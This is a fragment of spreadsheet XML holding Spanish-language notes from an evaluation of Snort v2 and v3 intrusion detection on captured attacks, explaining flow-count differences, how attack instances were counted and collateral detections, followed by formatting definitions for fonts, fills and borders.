    <t>Flujos Detectados Snort: la diferencia en los números de flujos detectados se debe puramente al método de identificación de flujos (no hay pérdida de información)</t>
  </si>
  <si>
    <t>Instancias Ataque: cada URL escaneada se considera como una instancia de ataque independiente                                                            Análisis Manual: este ataque, debido al gran número de alertas generadas y al tamaño del fichero no ha podido analizarse manualmente. Los resultados automáticos contarán pero no se contabilizarán los SIDs para las tablas de análisis</t>
  </si>
  <si>
    <t xml:space="preserve">Análisis Manual: este ataque, debido al gran número de alertas generadas y al tamaño del fichero no ha podido analizarse manualmente. Los resultados automáticos contarán pero no se contabilizarán los SIDs para las tablas de análisis                                                         </t>
  </si>
  <si>
    <t>Flujos Detectados Snort: la diferencia recae en el método de identificación de flujos. No hay pérdida de información.                                                             Instancias Colaterales: Snort detecta tanto el ataque como el uso de Metasploit como herramienta auxiliar</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no identifica un flujo ICMP (no afecta a los resultados)</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no identifica el flujo ICMP pero sí lo analiza (genera alertas relacionadas)</t>
  </si>
  <si>
    <t xml:space="preserve">Instancias Colaterales: el ataque contiene el establecimiento de sesión mediante la herramienta Sandcat, siendo éste detectado por Snort. </t>
  </si>
  <si>
    <t>Instancias Colaterales: el ataque hace uso de Sandcat como herramienta auxiliar para el ataque. Sin embargo, se trata de un ataque colateral que sí es detectado por Snort. El ataque principal, sin embargo, no es detectado</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no analiza dos flujos ICMP</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no detecta un flujo ICMP de la captura. Este flujo es irrelevante para el ataque</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no analiza un flujo ICMP. Este flujo no es relevante para el ataque</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no toma en consideración para el análisis los flujos ICMPv6</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no analiza dos flujos ICMP, pero no afecta a los resultados</t>
  </si>
  <si>
    <t>Instancias Ataque: cada instancia de ataque se corresponde con una solicitud al server SMB con el usuario y contraseñas en el paquete</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no analiza 2 flujos, uno ICMPv6 y otro IGMP, mientras que Snortv3 cuenta los reseteos de conexión como conexiones nuevas, provocando más flujos de la cuenta. Esto no afecta al resultado final.                                                                                       Instancias Colaterales: el ataque contiene la descarga del malware, pero se trata de un paso previo indispensable más que el propio ataque en sí, por lo que se considera como ataque colateral</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no analiza un flujo ICMP, pero no afecta a los resultados</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: ambas versiones de Snort detectan el número de flujos correcto. La variación de valores se debe puramente a la naturaleza de la identificación de flujos de Snort frente a tranalyzer</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: la diferencia entre los flujos detectados se debe a la interpretación de flujos de Snortv3 (no hay pérdidas) y a un flujo ICMP no identificado por Snortv2 (no afecta a los resultados).                                                                    Instancias Colaterales: el ataque contiene un establecimiento previo de sesión mediante Metasploit. Tanto este ataque colateral como el principal son detectados.</t>
  </si>
  <si>
    <t>Instancias Colaterales: el ataque contiene un establecimiento de conexión mediante Metasploit detectado correctamente por Snort. El ataque en sí, sin embargo, no es detectado.</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no analiza un flujo ICMP y otro IP. Estos flujos no son relevantes para el ataque</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: la diferencia entre los flujos detectados por las versiones de Snort y los presentes en la captura se debe a la existencia de flujos ICMP  y HPEXT, pero no son relevantes para el ataque</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: las diferencias entre los flujos detectados son irrelevantes. En Snortv2 no se analiza un flujo ICMP y en Snortv3 se desagrupa un flujo (tranalyzer) en dos. No afectan a los resultados</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: un flujo HPEXT (L2) no es analizado por ambas versiones de Snort. Dos flujos ICMP (uno de ellos con direcciones IPv6) no son analizados por Snortv2, aunque no son relevantes para el ataque.</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: a causa de la saturación provocada por el ataque, hay un total de 249 flujos que se han visto "podados" a causa de la falta de memoria. Estos flujos son contabilizados por Snortv3 pero no por Snortv2</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no analiza 10 flujos ICMP. Estos flujos son irrelevantes para el análisis del ataque</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: ambas versiones de Snort no analizan el flujo HPEXT de la captura de paquetes (irrelevante para los resultados)</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv3 considera un flujo de retransmisión como otro nuevo. Esto no afecta en absoluto a los resultados (no hay flujos sin analizar)</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: ambas versiones de Snort no analizan los dos flujos HPEXT de la captura de paquetes (irrelevante para los resultados)</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: la varianza respecto a los flujos detectados se debe a la propia interpretación de flujos de Snortv3 y a flujos ICMP ignorados por Snortv2. Ninguna de las dos son relevantes para los resultados.</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: la varianza respecto a los flujos detectados se debe a la propia interpretación de flujos de ambas versiones. No hay pérdida de información</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 omite 8 flujos ICMPv6 mientras que Snortv3 omite 4 (no tienen relevancia para el ataque). Entre estos flujos se encuentran algunos con la opción Hop-by-Hop que no son analizados por ninguna de las versiones</t>
  </si>
  <si>
    <t>Instancias Colaterales: el ataque contiene un establecimiento de conexión previo mediante Metasploit, detectado por Snort. El ataque principal, sin embargo, no es detectado</t>
  </si>
  <si>
    <t>Contaje Mensajes: el CSV de alertas identifica paquetes distintos con el mismo IDPaq (porque el contenido de los paquetes es idéntico), causando que el cálculo devuelva menos mensajes que flujos. Se ha arreglado esta errata de forma manual (RS4: 2 mensajes → 147 mensajes)                                                 Flujos Detectados: hay dos flujos que no son TCP/UDP/ICMP. Uno es un flujo HPEXT y otro un flujo IGMP. El primero no es analizado por Snortv3 y Snortv2 y el segundo no es analizado por Snortv2. No son relevantes para el ataque.</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: la diferencia en los números de flujos detectados se debe a flujos ICMP no identificados por Snortv2 y a flujos de capa 2 identificados por tranalyzer (no relevantes para los resultados)</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: la explicación a la diferencia entre los flujos detectados por Snortv2 (2) y Snortv3 (9) es sencilla. Atendiendo a puertos y direcciones tan sólo hay 2 flujos distintos, la clave está en que estas sesiones TCP que conforman los flujos se cierran y se vuelven a abrir, lo que causa que Snortv3 y tranalyzer lo consideren como nuevos flujos, no así Snortv2. Los resultados no se ven afectados.</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no analiza un flujo ICMP, que es el que falta para alcanzar los 170 flujos totales de la captura</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no detecta tres flujos ICMP (irrelevantes para el ataque)</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no identifica los flujos ICMP (aunque sí los analiza)</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no analiza el flujo ICMPv6 de la captura. Este flujo no es relevante para el ataque, por lo que no afecta a los resultados finales.                                                     Análisis Manual: este ataque, debido al gran número de alertas generadas y al tamaño del fichero no ha podido analizarse manualmente. Los resultados automáticos contarán pero no se contabilizarán los SIDs para las tablas de análisis</t>
  </si>
  <si>
    <t>Instancias Ataque: El ataque consiste en la ejecución de un comando nmap que escanea un rango extenso de puertos comunes. Cada uno de estos descubrimientos es considerado de forma independiente como instancia de ataque.                                                                      Flujos Detectados Snort: Snortv2 no analiza el flujo ICMP, por lo que detecta 1 flujo menos que el total. Este flujo no es relevante, por lo que no hay diferencias en la detección</t>
  </si>
  <si>
    <t>Instancias Ataque: Cada URL escaneada es considerada como una instancia de ataque.</t>
  </si>
  <si>
    <t>Instancias Ataque: Cada URL escaneada es considerada como una instancia de ataque.                           Análisis Manual: este ataque, debido al gran número de alertas generadas y al tamaño del fichero no ha podido analizarse manualmente. Los resultados automáticos contarán pero no se contabilizarán los SIDs para las tablas de análisis</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no analiza 1 flujo ICMPv6, lo que causa que en vez de 59 flujos detectados sean 58. Este flujo no es relevante para el ataque, por lo que no influye en los resultados</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no identifica dos flujos ICMP (no es relevante para el ataque)</t>
  </si>
  <si>
    <t>Flujos Detectados Snort: Snortv2 no analiza 4 flujos ICMPv6 ni uno IGMP. No afectan al resultado final, pues no se tratan de flujos con ataque.</t>
  </si>
  <si>
    <t>Operational Usability</t>
  </si>
  <si>
    <t>Operational Usability (correlated alerts)</t>
  </si>
  <si>
    <t>Operational Usability = FTTAR (False-to-True Alarm Rate):</t>
  </si>
  <si>
    <t>Operational Usability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</si>
</sst>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
  </numFmts>
  <fonts count="122">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sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF0070C0"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF7030A0"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="15"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="15"/>
      <color theme="4"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="15"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="5"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="8" tint="-0.249977111117893"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="15"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF0070C0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF7030A0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF00B050"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF7030A0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF00B050"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="14"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="14"/>
      <color rgb="FF34A853"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF6AA84F"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF434343"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="14"/>
      <color rgb="FF57BB8A"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="14"/>
      <color theme="7"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <sz val="13"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <color theme="10"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF6AA84F"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <u/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <strike/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="14"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="16"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="16"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="4"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="9.35"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF1F1F1F"/>
      <name val="&quot;Google Sans&quot;"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="5" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="7"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="20"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FF0070C0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF0070C0"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFC00000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FFC00000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF00B050"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF00B050"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFC00000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFC00000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="15"/>
      <color rgb="FFC00000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="14"/>
      <color rgb="FF0070C0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="14"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="20"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF0070C0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="15"/>
      <color rgb="FF0070C0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="15"/>
      <color rgb="FF7030A0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF7030A0"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color rgb="FF7030A0"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="15"/>
      <color rgb="FF7030A0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="14"/>
      <color rgb="FF0070C0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color rgb="FF7030A0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="10"/>
      <color rgb="FF7030A0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="10"/>
      <color rgb="FFC00000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFC00000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF0070C0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF00B050"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="5"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="8"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="8"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color rgb="FF0070C0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFCC00CC"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="4" tint="-0.249977111117893"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="4" tint="-0.249977111117893"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="7" tint="-0.249977111117893"/>
      <name val="Arial"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="49">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE6E6E6"/>
        <bgColor rgb="FFE6E6E6"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDAF1F3"/>
        <bgColor rgb="FFDAF1F3"/>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9FC5E8"/>
        <bgColor rgb="FF4A86E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFAFE3B1"/>
        <bgColor rgb="FFE6E6E6"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB6D7A8"/>
        <bgColor rgb="FFB6D7A8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF9FC5E8"/>
        <bgColor rgb="FF9FC5E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD1F1DA"/>
        <bgColor rgb="FF9FC5E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7" tint="0.79998168889431442"/>
        <bgColor rgb="FF9FC5E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0" tint="-0.14996795556505021"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0" tint="-0.14996795556505021"/>
        <bgColor rgb="FFDAF1F3"/>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FF2CC"/>
        <bgColor rgb="FFFF6D01"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFE599"/>
        <bgColor rgb="FFFF6D01"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFD966"/>
        <bgColor rgb="FFFF6D01"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF1C232"/>
        <bgColor rgb="FFFF6D01"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDAF1F3"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF2CC"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFE599"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFD966"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF1C232"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="5" tint="0.79998168889431442"/>
        <bgColor rgb="FFDAF1F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDEA900"/>
        <bgColor rgb="FFFFD966"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDEA900"/>
        <bgColor rgb="FFFF6D01"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDEA900"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDEA900"/>
        <bgColor rgb="FFFFF2CC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFE1FF"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8" tint="0.79998168889431442"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFCCFF"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF1DBE5"/>
        <bgColor rgb="FFE6E6E6"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFAFE3B1"/>
        <bgColor rgb="FFDAF1F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9" tint="0.59996337778862885"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF7E993"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor rgb="FFE6E6E6"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor rgb="FF9FC5E8"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="182">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>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ck">
        <color auto="1"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thick">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n">
        <color auto="1"/>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medium">
        <color indexed="64"/>
      </left>
      <right/>
      <top style="thin">
        <color indexed="64"/>
      </top>
